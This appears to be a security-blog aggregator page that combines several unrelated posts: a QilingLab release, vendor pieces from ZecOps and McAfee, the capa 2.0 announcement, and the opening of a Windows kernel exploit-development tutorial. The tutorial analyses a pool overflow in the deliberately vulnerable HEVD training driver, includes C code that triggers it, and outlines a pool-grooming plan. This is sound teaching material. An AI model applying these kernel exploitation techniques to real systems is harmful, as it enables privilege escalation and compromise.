
QilingLab – Release

21 July 2021 at 15:00
Two years ago Ross Marks created the FridaLab challenge as a playground to test and learn how to use the Frida dynamic instrumentation toolkit. At that time, I solved FridaLab and wrote a writeup explaining the main APIs and usages of Frida for Android, which helped others get familiar with the toolkit and served as a reference when developing Frida scripts. After trying Qiling for some time, I decided to follow Ross Marks' steps and develop a basic playground challenge that exercises the main Qiling features, which I obviously called QilingLab.

NSO Exploits Still Remain Mysterious: ZecOps Can Help You Fight Back

19 July 2021 at 09:57

This weekend, the Guardian released a groundbreaking report that authoritarian governments have breached the mobile devices of human rights activists, journalists, and lawyers across the world, using hacking software sold by NSO Group.

While the Guardian report contained new information regarding the targets of NSO customers and the Pegasus spyware, the specific mobile vulnerabilities that NSO leveraged were not identified and remain unpatched. This means that despite the public attribution, NSO tools remain just as powerful today as they were prior to the report.

Fight Back with ZecOps!

ZecOps suspects that NSO will quickly alter its methods so that the specific IOCs, or indicators of compromise, will be difficult to identify by mobile security researchers. However, with our Mobile EDR product, we can help your organization identify NSO attacks automatically by focusing on the behavior that remains present in the logs in addition to the publicly known IOCs.

Note: ZecOps does not collect or access your personal information. ZecOps will only collect information required for mobile security investigations, leaving personal information out.

Inspecting Your Phone – Free Inspection by ZecOps

To help discover these attacks, ZecOps is offering, for a limited time, free mobile inspections to businesses that were targeted by NSO. Please fill out the form below, and a member of our team will be in touch with you.


Fighting new Ransomware Techniques with McAfee’s Latest Innovations

20 July 2021 at 04:01

In 2021, ransomware attacks have dominated the biggest cyber security stories. Hence, I was not surprised to see that McAfee's June 2021 Threat Report is primarily focused on this topic.

This report provides a wide range of statistics using the McAfee data lake behind MVISION Insights, including the Top MITRE ATT&CK Techniques. From this report, I highlight the following MITRE techniques:

  1. Spear phishing links (Initial Access)
  2. Exploit public-facing applications (Initial Access)
  3. Windows Command Shell (Execution)
  4. User execution (Execution)
  5. Process Injection (Privilege escalation)
  6. Credentials from Web Browsers (Credential Access)
  7. Exfiltration to Cloud Storage (Exfiltration)

I also want to highlight one obvious technique which remains common across all ransomware attacks at the end of the attack lifecycle:

  1. Data encrypted for impact (Impact)

Traditional defences based on anti-malware signatures and web protection against known malicious domains and IP addresses can be insufficient to protect against these techniques. Therefore, for the rest of this article, I want to cover a few recent McAfee innovations which can make a big difference in the fight against ransomware.

Unified Cloud Edge with Remote Browser Isolation

The following three ransomware techniques are linked to web access:

  • Spear phishing links
  • User execution
  • Exfiltration to Cloud Storage

Moreover, most ransomware attacks require some form of access to a command-and-control server to be fully operational.

McAfee Remote Browser Isolation (RBI) ensures no malicious web content ever reaches enterprise endpoints' web browsers by isolating all browsing activity to unknown and risky websites into a remote virtual environment. With spear phishing links, RBI works best when running the mail client in the web browser. The user systems cannot be compromised if web code or files cannot run on them, making RBI the most powerful form of web threat protection available. RBI is included in most McAfee Unified Cloud Edge (UCE) licenses at no additional cost.

Figure 1. Concept of Remote Browser Isolation

McAfee Client Proxy (MCP) controls all web traffic, including ransomware web traffic initiated without a web browser by tools like MEGAsync and Rclone. MCP is part of McAfee Unified Cloud Edge (UCE).

Protection Against Fileless Attacks

The following ransomware techniques are linked to fileless attacks:

  • Windows Command Shell (Execution)
  • Process Injection (Privilege escalation)
  • User Execution (Execution)

Many ransomware attacks also use PowerShell.

Figure 2. Example of an attack kill chain with fileless techniques

McAfee provides a large range of technologies which protect against fileless attack methods, including McAfee ENS (Endpoint Security) Exploit Prevention and McAfee ENS 10.7 Adaptive Threat Protection (ATP). Here are a few examples of Exploit Prevention and ATP rules:

  • Exploit 6113-6114-6115-6121 Fileless threat: self-injection
  • Exploit 6116-6117-6122: Mimikatz suspicious activity
  • ATP 316: Prevent PDF readers from starting cmd.exe
  • ATP 502: Prevent new services from being created via sc.exe or powershell.exe

Regarding the use of Mimikatz in the example above, the new McAfee ENS 10.7 ATP Credential Theft Protection is designed to stop attacks against Windows LSASS so that you do not need to rely on the detection of Mimikatz.

Figure 3. Example of Exploit Prevention rules related to Mimikatz

ENS 10.7 ATP is now included in most McAfee Endpoint Security licenses at no additional cost.

Proactive Monitoring and Hunting with MVISION EDR

To prevent initial access, you also need to reduce the risks linked to the following technique:

  • Exploit public facing applications (Initial Access)

For example, RDP (Windows Remote Desktop Protocol) is a common initial access vector in ransomware attacks. You may have a policy that already prohibits or restricts RDP, but how do you know it is enforced on every endpoint?

With MVISION EDR (Endpoint Detection and Response) you can perform a real time search across all managed systems to see what is happening right now.

Figure 4. MVISION EDR Real-time Search to verify if RDP is enabled or disabled on a system

Figure 5. MVISION EDR Real-time Search to identify systems with active connections on RDP

MVISION EDR maintains a history of network connections inbound and outbound from the client. Performing an historical search for network traffic could identify systems that actively communicated on port 3389 to unauthorized addresses, potentially detecting attempts at exploitation.

MVISION EDR also enables proactive monitoring by a security analyst. The Monitoring Dashboard helps the analyst in the SOC quickly triage suspicious behavior.

For more EDR use cases related to ransomware see this blog article.

Actionable Threat Intelligence

With MVISION Insights you do not need to wait for the latest McAfee Threat Report to stay informed on the latest ransomware campaigns and threat profiles. You can easily address the following use cases:

  • Proactively assess your organization’s exposure to ransomware and prescribe how to reduce the attack surface:
    • Detect whether you have been hit by a known ransomware campaign
    • Run a Cyber Threat Intelligence program despite a lack of time and expertise
    • Prioritize threat hunting using the most relevant indicators

These use cases are covered in the webinar How to fight Ransomware with the latest McAfee innovations.

Regarding the following technique from the McAfee June 2021 Threat Report:

  • Credentials from Web Browsers (Credential Access)

MVISION Insights can display the detections in your environment as well as prevalence statistics.

Figure 6. Prevalence statistics from MVISION Insights on the LAZAGNE tool

MVISION Insights is included in several Endpoint Security licenses.

Rollback of Ransomware Encryption

Now we are left with the last technique in the attack lifecycle:

  • Data encrypted for impact (Impact)

McAfee ENS 10.7 Adaptive Threat Protection (ATP) provides dynamic application containment of suspicious processes and enhanced remediation with an automatic rollback of the ransomware encryption.

Figure 7. Configuration of Rollback remediation in ENS 10.7

You can see how files impacted by ransomware can be restored through Enhanced Remediation in this video. For more best practices on tuning Dynamic Application Containment rules, check the knowledge base article here.

Additional McAfee Protection Against Ransomware

Last year McAfee released this blog article covering additional capabilities from McAfee Endpoint Security (ENS), Endpoint Detection and Response (EDR) and the Management Console (ePO) against ransomware including:

  • ENS Exploit prevention
  • ENS Firewall
  • ENS Web control
  • ENS Self protection
  • ENS Story Graph
  • ePO Protection workspace
  • Additional EDR use cases against ransomware

Summary

To increase your protection against ransomware you might already be entitled to:

  • ENS 10.7 Adaptive Threat Protection
  • Unified Cloud Edge with Remote Browser Isolation and McAfee Client Proxy
  • MVISION Insights
  • MVISION EDR

If you are, you should start using them as soon as possible, and if you are not, contact us.

The post Fighting new Ransomware Techniques with McAfee’s Latest Innovations appeared first on McAfee Blog.

capa 2.0: Better, Faster, Stronger

19 July 2021 at 18:00

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven't heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project's release page and check out the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

  • New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
  • More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
  • Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
  • Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.


Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.


Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.


Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.


Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.


Figure 5: capa v1.6 results without library code recognition


Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.


Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in highly optimized routines, such as memcpy, to opt in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won't flag the embedded cpuid instruction, as it's not part of the programmer's code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license) we have spent significant time creating a comprehensive FLIRT signature set for the common malware analysis use case. The signatures come included with capa and are also available at our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we've incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

  • From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
    • C and C++ run-time libraries
    • Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
  • The following open-source projects as compiled with VS2015, VS2017, and VS2019:
    • CryptoPP
    • curl
    • Microsoft Detours
    • Mbed TLS (previously PolarSSL)
    • OpenSSL
    • zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpkg and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

  • Host Interaction describes program functionality to interact with the file system, processes, and the registry
  • Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
  • Collection describes functionality used to steal data such as credentials or credit card information
  • Data Manipulation describes capabilities to encrypt, decrypt, and hash data
  • Communication describes data transfer techniques such as HTTP, DNS, and TCP


Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

An Overall Philosophy on the Use of Critical Threat Intelligence

16 July 2021 at 20:15

The overarching threat facing cyber organizations today is a highly skilled asymmetric enemy, well-funded and resolute in his task and purpose.   You never can exactly tell how they will come at you, but come they will.  It’s no different than fighting a kinetic foe in that, before you fight, you must choose your ground and study your enemy’s tendencies.

A lot of focus has been placed on tools and updating technology, but often we are pushed back on our heels and find ourselves fighting a defensive action.

But what if we change?  How do we do that?

The first step is to study the battlefield, understand what you're trying to protect and lay down your protection strategy.  Pretty basic, right?

Your technology strategy is very important, but you must embrace and create a thorough Cyber Threat Intelligence (CTI) doctrine which must take on many forms.

First, there is data, and lots of it.  However, the data must take specific forms to research and detect nascent elements where the adversary is attempting to catch you napping or give you the perception that the activity you see is normal.

As you pool this data, it must be segmented into layers and literally mapped to geographic locations across the globe.  The data is classified distinctly as malicious and reputations are applied.  This is a vital step in that it enables analytical programs, along with human intelligence analysts to apply the data within intelligence reports which themselves can take on many forms.

Once the data takes an analytic form, then it allows organizations to forensically piece together a picture of an attack.  This process is painstakingly tedious but necessary to understand your enemy and his tendencies.  Tools are useful, but it’s always the human in the loop that will recognize the tactical and strategic implications of an adversary’s moves. Once you see the picture, it becomes real, and then you’re able to prepare your enterprise for the conflict that follows.

Your early warning and sensing strategy must incorporate this philosophy.  You must sense, collect, exploit, process, produce and utilize each intelligence product that renders useful information.  It’s this process that will enable any organization to move decisively to and stay “left of boom”.

The McAfee Advanced Programs Group (APG) was created eight years ago to support intelligence organizations that embrace and maintain a strong CTI stance.  Its philosophy is to blend people, processes, data and a strong intelligence heritage to enable our customers to understand the cyber battlefield to proactively protect, but “maneuver” when necessary to avoid an attack.

APG applies three key disciplines or mission areas to provide this support.

First, we developed an internal tool called the Advanced Threat Landscape Analysis System (ATLAS).  This enables our organization to apply our malicious threat detections to a geospatial map display to see where we’re seeing malicious data.  ATLAS draws from our global network of billions of threat sensors to see trillions of detections each day, but enables our analysts to concentrate on the most malicious activity.  Then we’re better able to research and report accurate threat landscape information.

The second leg in the stool is our analytical staff, the true cyber ninjas that apply decades of experience supporting HUMINT operations across the globe and a well-established intelligence-based targeting philosophy to the cyber environment.  The result is a true understanding of the cyber battlefield enabling the leadership to make solid “intelligence-based” decisions.

Finally, the third leg is our ability to develop custom solutions and interfaces that adapt, in a very custom way, how we see and study data.  We have the ability to leverage 2.8 billion malicious detections, along with 20 other distinct malicious feeds, to correlate many different views, not just the McAfee view.  We interpret agnostically.

These three legs provide APG a powerful CTI advantage, allowing our customers to adapt and respond to events by producing threat intelligence dynamically. Using this service allows the customer to be fully situationally aware at a moment's notice (visual command and control). Access to the data alone is an immense asset to any organization.  It allows each customer not only to know what their telemetry is, but also provides real-time insights into the entire world ecosystem. Finally, the human analysis alone is immensely valuable.  It allows organizations to read, see, and understand what it all means (the who, what, where and why).   "The so what!!"

The post An Overall Philosophy on the Use of Critical Threat Intelligence appeared first on McAfee Blog.

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2

18 July 2021 at 00:00

Introduction

This blog serves as Part 2 of a two-part series about pool corruption in the age of the segment heap on Windows. Part 1, which can be found here, starts this series off by leveraging an out-of-bounds read vulnerability to bypass kASLR from low integrity. By chaining that information leak with the bug outlined in this post, a pool overflow leading to an arbitrary read/write primitive, we will close out this series by outlining why pool corruption in the age of the segment heap has, in my estimation, a narrower scope of techniques than in the days of Windows 7.

Due to the recent release of Windows 11, which will have Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) enabled by default, we will pay homage to page table entry corruption techniques to bypass SMEP and DEP in the kernel with the exploit outlined in this blog post. Although Windows 11 will not be found in the enterprise for some time, as is the case with rolling out new technologies in any enterprise, vulnerability researchers will need to start moving away from leveraging artificially created executable memory regions in the kernel to execute code, towards either data-only style attacks or more novel techniques to bypass VBS and HVCI. This is the direction I hope to take my research in the future. This will most likely be the last post of mine which leverages page table entry corruption for exploitation.

Although there are much better explanations of pool internals on Windows, such as this paper and my coworker Yarden Shafir's upcoming Black Hat USA 2021 talk found here, Part 1 of this blog series contains much of the prerequisite knowledge used for this blog post. So although there are better resources, I urge you to read Part 1 first if you are using this blog post as a resource to follow along (which is the intent, and explains the length of my posts).

Vulnerability Analysis

Let’s take a look at the source code for BufferOverflowNonPagedPoolNx.c in the win10-klfh branch of HEVD, which reveals a rather trivial and controlled pool-based buffer overflow vulnerability.

The first function within the source file is TriggerBufferOverflowNonPagedPoolNx. This function, which returns a value of type NTSTATUS, is prototyped to accept a buffer, UserBuffer, and a size, Size. TriggerBufferOverflowNonPagedPoolNx invokes the kernel-mode API ExAllocatePoolWithTag to allocate a chunk from the NonPagedPoolNx pool of size POOL_BUFFER_SIZE. Where does this size come from? Taking a look at the very beginning of BufferOverflowNonPagedPoolNx.c, we can clearly see that BufferOverflowNonPagedPoolNx.h is included.

Taking a look at this header file, we can see a #define directive for the size, which is determined by a preprocessor directive to make this value 16 on a 64-bit Windows machine, which is what we are testing from. We now know that the pool chunk allocated by the call to ExAllocatePoolWithTag within TriggerBufferOverflowNonPagedPoolNx is 16 bytes.
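
For reference, the relevant directive looks roughly like the following (paraphrased from BufferOverflowNonPagedPoolNx.h; the 32-bit value is an assumption, as only the 64-bit case matters for this post):

#ifdef _WIN64
#define POOL_BUFFER_SIZE 16     // 64-bit build - the case used throughout this post
#else
#define POOL_BUFFER_SIZE 8      // assumed value for 32-bit builds
#endif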

The kernel-mode pool chunk, which is now allocated on the NonPagedPoolNx, is managed by the return value of ExAllocatePoolWithTag, which is KernelBuffer in this case. Looking a bit further down the code, we can see that RtlCopyMemory, which is a wrapper for a call to memcpy, copies the value of UserBuffer into the allocation managed by KernelBuffer. The size of the buffer copied into KernelBuffer is managed by Size. After the chunk is written to, based on the code in BufferOverflowNonPagedPoolNx.c, the pool chunk is also subsequently freed.

This basically means that the value specified by Size and UserBuffer will be used in the copy operation to copy memory into the pool chunk. We know that UserBuffer and Size are baked into the function definition for TriggerBufferOverflowNonPagedPoolNx, but where do these values come from? Taking a look further into BufferOverflowNonPagedPoolNx.c, we can actually see these values are extracted from the IRP sent to this function via the IOCTL handler.

This means that the client interacting with the driver via DeviceIoControl is able to control the contents and the size of the buffer copied into the pool chunk allocated on the NonPagedPoolNx, which is 16 bytes. The vulnerability here is that we can control the size and contents of the memory copied into the pool chunk, meaning we could specify a value greater than 16, which would write to memory outside the bounds of the allocation, a la an out-of-bounds write vulnerability, known as a “pool overflow” in this case.

Let’s put this theory to the test by expanding upon our exploit from part one and triggering the vulnerability.

Triggering The Vulnerability

We will leverage the previous exploit from Part 1 and tack the pool overflow code onto the end, after the for loop which parses out the base address of HEVD.sys. This code can be seen below, which sends a buffer of 50 bytes to the pool chunk of 16 bytes. The IOCTL to reach the TriggerBufferOverflowNonPagedPoolNx function is 0x0022204b.
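
For readers following along without the Part 1 code, a minimal standalone sketch of just the trigger is shown below. The device name and IOCTL are taken from this post; the buffer contents are illustrative.

#include <windows.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
    // Open a handle to the HEVD device (assumed device name)
    HANDLE hHEVD = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0, NULL, OPEN_EXISTING, 0, NULL);

    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Unable to obtain a handle to the driver\n");
        return 1;
    }

    // 50 bytes of 'A's copied into a 16-byte NonPagedPoolNx chunk = pool overflow
    BYTE overflowBuffer[50];
    memset(overflowBuffer, 0x41, sizeof(overflowBuffer));

    DWORD bytesReturned = 0;
    DeviceIoControl(
        hHEVD,
        0x0022204b,                 // TriggerBufferOverflowNonPagedPoolNx
        overflowBuffer, sizeof(overflowBuffer),
        NULL, 0,
        &bytesReturned, NULL);

    return 0;
}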

After this allocation is made and the pool chunk is subsequently freed, we can see that a BSOD occurs with a bug check indicating that a pool header has been corrupted.

This is the result of our out-of-bounds write vulnerability, which has corrupted a pool header. When a pool header is corrupted and the chunk is subsequently freed, an "integrity" check is performed on the in-scope pool chunk to ensure it has a valid header. Because we have arbitrarily written contents past the pool chunk allocated for our buffer sent from user mode, we have subsequently overwritten other pool chunks. Due to this, and due to every chunk in the kLFH, which is where our allocation resides based on heuristics mentioned in Part 1, being prepended with a _POOL_HEADER structure, we have corrupted the header of each subsequent chunk. We can confirm this by setting a breakpoint on the call to ExAllocatePoolWithTag and enabling debug printing to see the layout of the pool before the free occurs.

The breakpoint set on the address fffff80d397561de, which is the first breakpoint seen being set in the above photo, is a breakpoint on the actual call to ExAllocatePoolWithTag. The breakpoint set at the address fffff80d39756336 is the instruction that comes directly before the call to ExFreePoolWithTag. This breakpoint is hit at the bottom of the above photo via Breakpoint 3 hit. This is to ensure execution pauses before the chunk is freed.

We can then inspect the vulnerable chunk responsible for the overflow to determine if the _POOL_HEADER tag corresponds with the chunk, which it does.

After letting execution resume, a bug check occurs again. This is due to a pool chunk being freed which has an invalid header.

This validates that an out-of-bounds write does exist. The question now is, with a kASLR bypass in hand, how do we comprehensively execute kernel-mode code from user mode?

Exploitation Strategy

Fair warning - this section contains a lot of code analysis to understand what this driver is doing in order to groom the pool, so please bear this in mind.

As you can recall from Part 1, the key to pool exploitation in the age of the segment heap, when exploiting the kLFH specifically, is to find objects that are the same size as the vulnerable object, contain an interesting member, can be allocated from user mode, and are allocated on the same pool type as the vulnerable object. Recall that the vulnerable object is 16 bytes in size. The goal now is to look at the source code of the driver to determine if there isn't a useful object that we can allocate which meets all of the parameters above. Note again, the toughest part of pool exploitation is finding worthwhile objects.

Luckily, and slightly contrived, there are two files called ArbitraryReadWriteHelperNonPagedPoolNx.c and ArbitraryReadWriteHelperNonPagedPoolNx.h which are useful to us. As the names suggest, these files seem to allocate some sort of object on the NonPagedPoolNx. Again, note that at this point in the real world we would need to reverse engineer the driver, look at all instances of pool allocations, inspect their arguments at runtime, and see if there isn't a way to get useful objects into the same pool and kLFH bucket as the vulnerable object for pool grooming.

ArbitraryReadWriteHelperNonPagedPoolNx.h contains two interesting structures, seen below, as well as several function definitions (which we will touch on later - please make sure you become familiar with these structures and their members!).
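
A rough reconstruction of the two structures is shown below, inferred from the members referenced throughout this post; the exact member order and types in the HEVD header may differ.

// Inferred layout - member order and types are assumptions based on this post
typedef struct _ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
{
    PVOID Name;        // Buffer allocated on the NonPagedPoolNx
    SIZE_T Length;     // Size of the Name buffer
} ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, *PARW_HELPER_OBJECT_NON_PAGED_POOL_NX;

// I/O structure exchanged with the user-mode client via DeviceIoControl
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;   // Kernel-mode address of the helper object, bubbled back to user mode
    PVOID Name;                  // User-supplied pointer used by the Set/Get operations
    SIZE_T Length;               // User-supplied length for the Name allocation
} ARW_HELPER_OBJECT_IO, *PARW_HELPER_OBJECT_IO;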

As we can see, each function definition takes a parameter of type PARW_HELPER_OBJECT_IO, which is a pointer to an ARW_HELPER_OBJECT_IO object, defined above.

Let's examine ArbitraryReadWriteHelperNonPagedPoolNx.c in order to determine how these ARW_HELPER_OBJECT_IO objects are instantiated and leveraged in the functions defined above.

Looking at ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see it contains several IOCTL handlers. This is indicative that these ARW_HELPER_OBJECT_IO objects will be sent from a client (us). Let’s take a look at the first IOCTL handler.

It appears that ARW_HELPER_OBJECT_IO objects are created through the CreateArbitraryReadWriteHelperObjectNonPagedPoolNxIoctlHandler IOCTL handler. This handler accepts a buffer, casts the buffer to type ARW_HELPER_OBJECT_IO, and passes the buffer to the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Let's inspect CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

CreateArbitraryReadWriteHelperObjectNonPagedPoolNx first declares a few things:

  1. A pointer called Name
  2. A SIZE_T variable, Length
  3. An NTSTATUS variable which is set to STATUS_SUCCESS for error handling purposes
  4. An integer, FreeIndex, which is set to the value STATUS_INVALID_INDEX
  5. A pointer of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, called ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we saw previously defined in ArbitraryReadWriteHelperNonPagedPoolNx.h.

The function, after declaring the pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX previously mentioned, probes the input buffer from the client, parsed from the IOCTL handler, to verify it is in user mode and then stores the length specified by the ARW_HELPER_OBJECT_IO structure’s Length member into the previously declared variable Length. This ARW_HELPER_OBJECT_IO structure is taken from the user mode client interacting with the driver (us), meaning it is supplied from the call to DeviceIoControl.

Then, a function called GetFreeIndex is called and the result of the operation is stored in the previously declared variable FreeIndex. If the return value of this function is equal to STATUS_INVALID_INDEX, the function returns the status to the caller. If the value is not STATUS_INVALID_INDEX, CreateArbitraryReadWriteHelperObjectNonPagedPoolNx then calls ExAllocatePoolWithTag to allocate memory for the previously declared PARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointer, which is called ARWHelperObject. This object is placed on the NonPagedPoolNx, as seen below.

After allocating memory for ARWHelperObject, the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then allocates another chunk from the NonPagedPoolNx and assigns this memory to the previously declared pointer Name.

This newly allocated memory is then initialized to zero. The previously declared pointer, ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, then has its Name member set to the previously declared pointer Name, which had its memory allocated in the previous ExAllocatePoolWithTag operation, and its Length member set to the local variable Length, which grabbed the length sent by the user-mode client in the IOCTL operation via the input buffer of type ARW_HELPER_OBJECT_IO, as seen below. This essentially just initializes the structure's values.

Then, an array called g_ARWHelperObjectNonPagedPoolNx, at the index specified by FreeIndex, is initialized to the address of the ARWHelperObject. This array is actually an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects and manages such objects. It is defined at the beginning of ArbitraryReadWriteHelperNonPagedPoolNx.c, as seen below.

Before moving on - I realize this is a lot of code analysis, but I will add in diagrams and tl;dr’s later to help make sense of all of this. For now, let’s keep digging into the code.

Let’s recall how the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function was prototyped:

NTSTATUS
CreateArbitraryReadWriteHelperObjectNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
);

